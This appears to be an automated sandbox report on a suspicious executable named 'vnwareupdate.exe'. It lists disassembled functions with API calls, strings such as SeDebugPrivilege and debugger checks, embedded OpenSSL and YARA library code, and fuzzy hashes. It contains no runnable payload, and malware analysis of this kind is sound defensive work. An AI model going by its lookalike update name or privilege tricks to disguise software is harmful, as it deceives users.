Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide
String ID: ..\..\openssl-1.1.0e\engines\e_capi.c
API String ID: 626452242-79188018
Opcode ID: f70733d8abe4398d130a86876037c5754c986f325d5695804ed42a798515ff08
Instruction ID: 4bd766b4a8d4362462a669e5844329bbc54f97a7c02783a9b55543175f188f6e
Opcode Fuzzy Hash: f70733d8abe4398d130a86876037c5754c986f325d5695804ed42a798515ff08
Instruction Fuzzy Hash: 2721FB76BC43183AF6206AB97C8AF67334CDB80F59F040425F70DEABC2E6D1E95445A4

Uniqueness

Uniqueness Score: -1.00%

Function 02C799B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 02C79770: GetStdHandle.KERNEL32(000000F4), ref: 02C7978C
Part of subcall function 02C79770: GetFileType.KERNEL32(00000000), ref: 02C79799
Part of subcall function 02C79770: _vsnprintf.MSVCR90 ref: 02C797B7
Part of subcall function 02C79770: WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02C797DA

raise.MSVCR90 ref: 02C799CB
_exit.MSVCR90 ref: 02C799D5

Strings

%s:%d: OpenSSL internal error: %s, xrefs: 02C799BF

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: File$HandleTypeWrite_exit_vsnprintfraise
String ID: %s:%d: OpenSSL internal error: %s
API String ID: 1829284227-569889646
Opcode ID: 825b98b856050e18029fd342226d6b9bb37d2fda855483c51088742e68c1e8c2
Instruction ID: edf992f256739fc66a265b39852e88215ecdc42b92d3998040dec2954493f6b3
Opcode Fuzzy Hash: 825b98b856050e18029fd342226d6b9bb37d2fda855483c51088742e68c1e8c2
Instruction Fuzzy Hash: C6F0E27B6482103FE5009678EC919BBF7EA9FDA720F16450DF5C987340C271AC049A62

Uniqueness

Uniqueness Score: -1.00%

Function 02C31D50, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

PyErr_Format.PYTHON27(02999968,line %d: %s,?,?), ref: 02C31D97

Strings

line %d: %s, xrefs: 02C31D91
%s(%d): %s, xrefs: 02C31D78

Memory Dump Source

Source File: 00000003.00000002.531438765.0000000002C31000.00000020.00020000.sdmp, Offset: 02C30000, based on PE: true

Associated: 00000003.00000002.531375652.0000000002C30000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533203919.0000000002CFC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.533701034.0000000002D45000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533765337.0000000002D46000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.533824426.0000000002D48000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.533866625.0000000002D49000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.534009272.0000000002D4F000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534130268.0000000002D56000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.534208405.0000000002D57000.00000002.00020000.sdmp Download File

Similarity

API ID: Err_Format
String ID: %s(%d): %s$line %d: %s
API String ID: 376477240-3587166966
Opcode ID: b0dad3a1a29f7d99f49401876aaa06899e075cde8b98fd2b6905431dd847fa38
Instruction ID: a5aa8da5b87497c414f491206db268a37e0dc642402881d89d8a7d8b5b0e9dfd
Opcode Fuzzy Hash: b0dad3a1a29f7d99f49401876aaa06899e075cde8b98fd2b6905431dd847fa38
Instruction Fuzzy Hash: 99F09BB4A48301EFD344CF28E944A2ABBE4FBC9691F408D5DF49883340D7B0D9288F66

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 8windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32 ref: 0040100A
Py_Finalize.PYTHON27(?,cx_Freeze Fatal Error,00000010), ref: 00401010

Strings

cx_Freeze Fatal Error, xrefs: 00401002

Memory Dump Source

Source File: 00000003.00000002.486851611.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.486844307.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486858661.0000000000402000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486865936.0000000000403000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486876464.0000000000404000.00000002.00020000.sdmp Download File

Similarity

API ID: FinalizeMessage
String ID: cx_Freeze Fatal Error
API String ID: 879571140-3015755829
Opcode ID: db4ca6a246b3b0395e51b87b301ea074756a87196991e3239b3a389869f5c2a7
Instruction ID: b4dbad019f7e93385a171ecd43177197dd961c011f45688f641d1c358dba8af1
Opcode Fuzzy Hash: db4ca6a246b3b0395e51b87b301ea074756a87196991e3239b3a389869f5c2a7
Instruction Fuzzy Hash: DFB092702A1200AAE1201B249F0EB183958BB04B22FA00720B2A1F80E0C6F41410C92C

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vnwareupdate.exe PID: 4456 Parent PID: 2540 vnwareupdate.exeCOMMON

Executed Functions

Function 02D53A10, Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00008000,00000000,02D539AE), ref: 02D53A19

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 1c5c65a7a8b64fd4a78c4758fb2618761900d4cb66cbc81546bd7127877d3b2d
Instruction ID: d8995d88c121797984a390c438f1c65a4f50063c6f31f429af1cc0c9c93335d2
Opcode Fuzzy Hash: 1c5c65a7a8b64fd4a78c4758fb2618761900d4cb66cbc81546bd7127877d3b2d
Instruction Fuzzy Hash: DEC02B72ED4B010AF3100A76CC0BF0431602330F10FE01700F261CC1C0F99840C40500

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02DB0380, Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 244encryptionCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 02DB03D2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 02DB03F7
GetLastError.KERNEL32 ref: 02DB042B
CryptAcquireContextW.ADVAPI32(F0000000,00000000,00000000,?,F0000000), ref: 02DB0460
CryptGetProvParam.ADVAPI32(?,00000002,00000000,?,00000001), ref: 02DB0499
GetLastError.KERNEL32 ref: 02DB04CD
CryptReleaseContext.ADVAPI32(?,00000000), ref: 02DB04E2
CryptGetProvParam.ADVAPI32(?,00000002,00000000,?,00000000), ref: 02DB057C
GetLastError.KERNEL32 ref: 02DB05C2
CryptReleaseContext.ADVAPI32(?,00000000), ref: 02DB0633

Strings

Got max container len %d, xrefs: 02DB04F1
Container name %s, len=%d, index=%d, flags=%d, xrefs: 02DB0590
%lu. %s, xrefs: 02DB05B1
..\..\openssl-1.1.0e\engines\e_capi.c, xrefs: 02DB0419, 02DB0482, 02DB04BB, 02DB0514, 02DB0540, 02DB05EA, 02DB061F
Listing containers CSP=%s, type = %d, xrefs: 02DB03A7
Enumerate bug: using workaround, xrefs: 02DB060B

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: Crypt$ContextErrorLast$ByteCharMultiParamProvReleaseWide$Acquire
String ID: %lu. %s$..\..\openssl-1.1.0e\engines\e_capi.c$Container name %s, len=%d, index=%d, flags=%d$Enumerate bug: using workaround$Got max container len %d$Listing containers CSP=%s, type = %d
API String ID: 2639310310-608761734
Opcode ID: 800994935f624f73ae1195bd43531a97da4d24d19d3aa52dc7551667538b9cc7
Instruction ID: 460fef88966d5ad4c1c22d36bab265e498c0f9cc00e43b13b28df9c614ea41b0
Opcode Fuzzy Hash: 800994935f624f73ae1195bd43531a97da4d24d19d3aa52dc7551667538b9cc7
Instruction Fuzzy Hash: 9D71E3B0E80214BBEB109B659C99FAF7779EF40B04F508918F906E7381E7759C94CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02DB0AA0, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 149encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(00000004,00000001,00000001,?,?,00000000), ref: 02DB0B90
GetLastError.KERNEL32 ref: 02DB0BC4

Strings

capi_get_key, contname=%s, provname=%s, type=%d, xrefs: 02DB0B38
..\..\openssl-1.1.0e\engines\e_capi.c, xrefs: 02DB0AB6, 02DB0B49, 02DB0B59, 02DB0BB2, 02DB0C03, 02DB0C34
capi_get_key, contname=%s, RSA_AES_CSP, xrefs: 02DB0AED
, xrefs: 02DB0B70

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: AcquireContextCryptErrorLast
String ID: $..\..\openssl-1.1.0e\engines\e_capi.c$capi_get_key, contname=%s, RSA_AES_CSP$capi_get_key, contname=%s, provname=%s, type=%d
API String ID: 2322988497-2057759941
Opcode ID: 8004bfb2b82d90ce24d4b0aeac6472aaf10444bc67b2b845109d122cb42d278a
Instruction ID: fec36ab2261d99a5970fe8e20a51c73f93c893ba4b8aa8b74444e35ac307e38f
Opcode Fuzzy Hash: 8004bfb2b82d90ce24d4b0aeac6472aaf10444bc67b2b845109d122cb42d278a
Instruction Fuzzy Hash: D2413871A80300EFE7109F61AC94F6BB3A9EF80B09F04891AF546A6341E775DD45CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 02D56250, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

SeDebugPrivilege, xrefs: 02D6E801

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocHeap
String ID: SeDebugPrivilege
API String ID: 4292702814-2896544425
Opcode ID: 1255fbcd622c089262e13b6091079215205a33395e567a9f4bb9e0eb515d0c8c
Instruction ID: 5938b21baf036475c404e33b0a4728ea1bcfe7cb02d5d3cce1eb5492d6528354
Opcode Fuzzy Hash: 1255fbcd622c089262e13b6091079215205a33395e567a9f4bb9e0eb515d0c8c
Instruction Fuzzy Hash: 0B318EB4A443009FD300DF55C888F5BBBE4AF88704F548AADF9498B391E771D985CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02DB0E90, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 131encryptionCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 02DB0ED1
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000,?,000000FF,00000000,00000000), ref: 02DB0EF4
CryptAcquireContextW.ADVAPI32(?,00000000,?,?,F0000000,?,000000FF,?,00000000,?,000000FF,00000000,00000000), ref: 02DB0F12
CryptReleaseContext.ADVAPI32(?,00000000,?,?,F0000000,?,000000FF,?,00000000,?,000000FF,00000000,00000000), ref: 02DB0F22
GetLastError.KERNEL32 ref: 02DB0FB1

Strings

capi_ctx_set_provname, name=%s, type=%d, xrefs: 02DB0EB1
..\..\openssl-1.1.0e\engines\e_capi.c, xrefs: 02DB0F30, 02DB0F60, 02DB0F9F, 02DB0FDD

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharContextCryptMultiWide$AcquireErrorLastRelease
String ID: ..\..\openssl-1.1.0e\engines\e_capi.c$capi_ctx_set_provname, name=%s, type=%d
API String ID: 2868654666-2278323642
Opcode ID: b129c463d94dff3bc5a5881ae941ee46e1b4ebd68f5aec83952b14e32aee09ad
Instruction ID: b79dda95ba5297afc77b970f4d091af572b86eecb2fb78fc4c54182768d9b48e
Opcode Fuzzy Hash: b129c463d94dff3bc5a5881ae941ee46e1b4ebd68f5aec83952b14e32aee09ad
Instruction Fuzzy Hash: B5412771FC0304BBEB209F659C49F9B33A9EF44B14F008615F90A9B3C0DA719954CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02E0AD3E, Relevance: 10.6, APIs: 7, Instructions: 58COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 02E0B43B
_crt_debugger_hook.MSVCR90(00000001), ref: 02E0B448
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02E0B450
UnhandledExceptionFilter.KERNEL32(02E52D88), ref: 02E0B45B
_crt_debugger_hook.MSVCR90(00000001), ref: 02E0B46C
GetCurrentProcess.KERNEL32(C0000409), ref: 02E0B477
TerminateProcess.KERNEL32(00000000), ref: 02E0B47E

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled_crt_debugger_hook$CurrentDebuggerPresentTerminate
String ID:
API String ID: 3369434319-0
Opcode ID: 028f79ad3782c9d9bd504bc680d44afc4c3618a048c143f52064373f106764f6
Instruction ID: 0a77808d2ab03a85c937748e27d6922a303f9577de7a606f340cb4a7efba29e5
Opcode Fuzzy Hash: 028f79ad3782c9d9bd504bc680d44afc4c3618a048c143f52064373f106764f6
Instruction Fuzzy Hash: 5921F3B4CE03049FD700DF2BE0886463BB8FB48798F90585AE50887649E7B959E5CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02D46FD0, Relevance: 94.9, APIs: 32, Strings: 31, Instructions: 374COMMON

Download Yara Rule

APIs

_snprintf.MSVCR90 ref: 02D47000
_snprintf.MSVCR90 ref: 02D47020
_snprintf.MSVCR90 ref: 02D47040
_snprintf.MSVCR90 ref: 02D47060
_snprintf.MSVCR90 ref: 02D47080
_snprintf.MSVCR90 ref: 02D470A0
_snprintf.MSVCR90 ref: 02D470C0
_snprintf.MSVCR90 ref: 02D470E0
_snprintf.MSVCR90 ref: 02D47100
_snprintf.MSVCR90 ref: 02D47120
_snprintf.MSVCR90 ref: 02D47140
_snprintf.MSVCR90 ref: 02D47160
_snprintf.MSVCR90 ref: 02D47180
_snprintf.MSVCR90 ref: 02D471A0
_snprintf.MSVCR90 ref: 02D471B9
_snprintf.MSVCR90 ref: 02D471D2
_snprintf.MSVCR90 ref: 02D471EB
_snprintf.MSVCR90 ref: 02D47204
_snprintf.MSVCR90 ref: 02D4721D
_snprintf.MSVCR90 ref: 02D4723D
_snprintf.MSVCR90 ref: 02D4725D
_snprintf.MSVCR90 ref: 02D47276
_snprintf.MSVCR90 ref: 02D47296
_snprintf.MSVCR90 ref: 02D472AF
_snprintf.MSVCR90 ref: 02D472CF
_snprintf.MSVCR90 ref: 02D472E8
_snprintf.MSVCR90 ref: 02D47301
_snprintf.MSVCR90 ref: 02D4731A
_snprintf.MSVCR90 ref: 02D47333
_snprintf.MSVCR90 ref: 02D47364
_snprintf.MSVCR90 ref: 02D47384
_snprintf.MSVCR90 ref: 02D4739D

Strings

not enough memory, xrefs: 02D46FF9
duplicated tag identifier "%s", xrefs: 02D47059
undefined string "%s", xrefs: 02D470B9
too many levels of included rules, xrefs: 02D471E4
too many strings in rule "%s" (limit: %d), xrefs: 02D4735D
division by zero, xrefs: 02D472FA
unreferenced string "%s", xrefs: 02D470F9
could not read file, xrefs: 02D47396
loop nesting limit exceeded, xrefs: 02D471FD
duplicated loop identifier "%s", xrefs: 02D47099
wrong use of anonymous string, xrefs: 02D471B2
include circular reference, xrefs: 02D471CB
invalid field name "%s", xrefs: 02D47199
duplicated string identifier "%s", xrefs: 02D47039
wrong arguments for function "%s", xrefs: 02D4728F
regular expression is too complex, xrefs: 02D4732C
internal fatal error, xrefs: 02D472E1
empty string "%s", xrefs: 02D47119
"%s" is not a structure, xrefs: 02D47139
invalid module name "%s", xrefs: 02D47256
duplicated structure member, xrefs: 02D4726F
regular expression is too large, xrefs: 02D47313
"%s" is not a function, xrefs: 02D47179
unknown module "%s", xrefs: 02D47236
wrong return type for overloaded function, xrefs: 02D472A8
integer overflow in "%s", xrefs: 02D4737D
'for <quantifier> of <string set>' loops can't be nested, xrefs: 02D47216
"%s" is not an array or dictionary, xrefs: 02D47159
duplicated metadata identifier "%s", xrefs: 02D47079
duplicated identifier "%s", xrefs: 02D47019
undefined identifier "%s", xrefs: 02D470D9

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: _snprintf
String ID: "%s" is not a function$"%s" is not a structure$"%s" is not an array or dictionary$'for <quantifier> of <string set>' loops can't be nested$could not read file$division by zero$duplicated identifier "%s"$duplicated loop identifier "%s"$duplicated metadata identifier "%s"$duplicated string identifier "%s"$duplicated structure member$duplicated tag identifier "%s"$empty string "%s"$include circular reference$integer overflow in "%s"$internal fatal error$invalid field name "%s"$invalid module name "%s"$loop nesting limit exceeded$not enough memory$regular expression is too complex$regular expression is too large$too many levels of included rules$too many strings in rule "%s" (limit: %d)$undefined identifier "%s"$undefined string "%s"$unknown module "%s"$unreferenced string "%s"$wrong arguments for function "%s"$wrong return type for overloaded function$wrong use of anonymous string
API String ID: 3512837008-3960654680
Opcode ID: 0f4cce5cf6e19f49189b3ee8e741b70404eaf1d7e3cf2e6a4f9b67cda0ce11b0
Instruction ID: d017b61731042cebb47ef5d9f243f96dca252907353ef609ea88c06f3b99822f
Opcode Fuzzy Hash: 0f4cce5cf6e19f49189b3ee8e741b70404eaf1d7e3cf2e6a4f9b67cda0ce11b0
Instruction Fuzzy Hash: 2FA1BE327C41206BE240EB4DFC49C9FB3ACDFC0F15B444627F64DD2655C6A19DE286AA

Uniqueness

Uniqueness Score: -1.00%

Function 02D428A0, Relevance: 85.9, APIs: 25, Strings: 24, Instructions: 144COMMON

Download Yara Rule

APIs

Py_InitModule4.PYTHON27(yara,02E55E40,This module allows you to apply YARA rules to files or strings.For complete documentation please visit:https://plusvic.github.io/yara,00000000,000003F5), ref: 02D428B7
PyModule_AddIntConstant.PYTHON27(00000000,CALLBACK_CONTINUE,00000000), ref: 02D428DA
PyModule_AddIntConstant.PYTHON27(00000000,CALLBACK_ABORT,00000001), ref: 02D428E4
PyModule_AddIntConstant.PYTHON27(00000000,CALLBACK_MATCHES,00000001), ref: 02D428EE
PyModule_AddIntConstant.PYTHON27(00000000,CALLBACK_NON_MATCHES,00000002), ref: 02D428F8
PyModule_AddIntConstant.PYTHON27(00000000,CALLBACK_ALL,00000003), ref: 02D42902
PyModule_AddStringConstant.PYTHON27(00000000,__version__,3.10.0), ref: 02D42915
PyModule_AddStringConstant.PYTHON27(00000000,YARA_VERSION,3.10.0), ref: 02D42925
PyModule_AddIntConstant.PYTHON27(00000000,YARA_VERSION_HEX,00030A00), ref: 02D42932
PyErr_NewException.PYTHON27(yara.Error,?,00000000), ref: 02D42949
PyErr_NewException.PYTHON27(yara.SyntaxError,00000000,00000000,?,00000000), ref: 02D42958
PyErr_NewException.PYTHON27(yara.TimeoutError,02A9A790,00000000,?,00000000), ref: 02D4296D
PyErr_NewException.PYTHON27(yara.WarningError,02A9A790,00000000,?,00000000), ref: 02D42981
PyType_Ready.PYTHON27(02E55310), ref: 02D42996
PyType_Ready.PYTHON27(02E55450), ref: 02D429A8
PyType_Ready.PYTHON27(02E55188), ref: 02D429BA
PyModule_AddObject.PYTHON27(00000000,Rule,02E55310), ref: 02D429D8
PyModule_AddObject.PYTHON27(00000000,Rules,02E55450), ref: 02D429E5
PyModule_AddObject.PYTHON27(00000000,Match,02E55188), ref: 02D429F2
PyModule_AddObject.PYTHON27(00000000,Error,02A9A790), ref: 02D42A01
PyModule_AddObject.PYTHON27(00000000,SyntaxError,02A9A968), ref: 02D42A10
PyModule_AddObject.PYTHON27(00000000,TimeoutError,02A9AB40), ref: 02D42A1E
PyModule_AddObject.PYTHON27(00000000,WarningError,02A9AD18), ref: 02D42A30

Part of subcall function 02D53930: _time64.MSVCR90 ref: 02D53949
Part of subcall function 02D53930: srand.MSVCR90 ref: 02D53950
Part of subcall function 02D53930: tolower.MSVCR90 ref: 02D53994

PyErr_SetString.PYTHON27(02A9A790,initialization error), ref: 02D42A4A
Py_AtExit.PYTHON27(02D42890), ref: 02D42A5C

Strings

Match, xrefs: 02D429EC
CALLBACK_MATCHES, xrefs: 02D428E8
yara, xrefs: 02D428B2
Error, xrefs: 02D429FB
YARA_VERSION_HEX, xrefs: 02D4292C
__version__, xrefs: 02D4290F
CALLBACK_NON_MATCHES, xrefs: 02D428F2
Rule, xrefs: 02D429D2
YARA_VERSION, xrefs: 02D4291F
CALLBACK_CONTINUE, xrefs: 02D428D4
initialization error, xrefs: 02D42A44
This module allows you to apply YARA rules to files or strings.For complete documentation please visit:https://plusvic.github.io/yara, xrefs: 02D428A8
TimeoutError, xrefs: 02D42A18
yara.WarningError, xrefs: 02D4297C
yara.Error, xrefs: 02D42944
WarningError, xrefs: 02D42A2A
yara.SyntaxError, xrefs: 02D4294E
SyntaxError, xrefs: 02D42A0A
Rules, xrefs: 02D429DF
CALLBACK_ALL, xrefs: 02D428FC
CALLBACK_ABORT, xrefs: 02D428DE
yara.TimeoutError, xrefs: 02D42963
3.10.0, xrefs: 02D4290A
3.10.0, xrefs: 02D4291A

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: Module_$Constant$Object$Err_$Exception$ReadyStringType_$ExitInitModule4_time64srandtolower
String ID: 3.10.0$3.10.0$CALLBACK_ABORT$CALLBACK_ALL$CALLBACK_CONTINUE$CALLBACK_MATCHES$CALLBACK_NON_MATCHES$Error$Match$Rule$Rules$SyntaxError$This module allows you to apply YARA rules to files or strings.For complete documentation please visit:https://plusvic.github.io/yara$TimeoutError$WarningError$YARA_VERSION$YARA_VERSION_HEX$__version__$initialization error$yara$yara.Error$yara.SyntaxError$yara.TimeoutError$yara.WarningError
API String ID: 4234569520-1936999633
Opcode ID: 68462a72df6d51bb5476d3146735962a3b3bc6778c9130d24202f1c70c594bfe
Instruction ID: 52f48a9bcaf9b0b65fb72293c424a094ff894f3af80cfe263f11d8723d745a06
Opcode Fuzzy Hash: 68462a72df6d51bb5476d3146735962a3b3bc6778c9130d24202f1c70c594bfe
Instruction Fuzzy Hash: DA41E631BE0320BBF12063676C4BF9F635CDF94E44FD5A441FD0266244CBE4A5918AB9

Uniqueness

Uniqueness Score: -1.00%

Function 02D42060, Relevance: 77.5, APIs: 33, Strings: 11, Instructions: 477COMMON

Download Yara Rule

APIs

_PyArg_ParseTupleAndKeywords_SizeT.PYTHON27(?,?,|ssOOOOOOO,02E55ADC,?,?,?,?,?,?,?,?,?), ref: 02D420D4
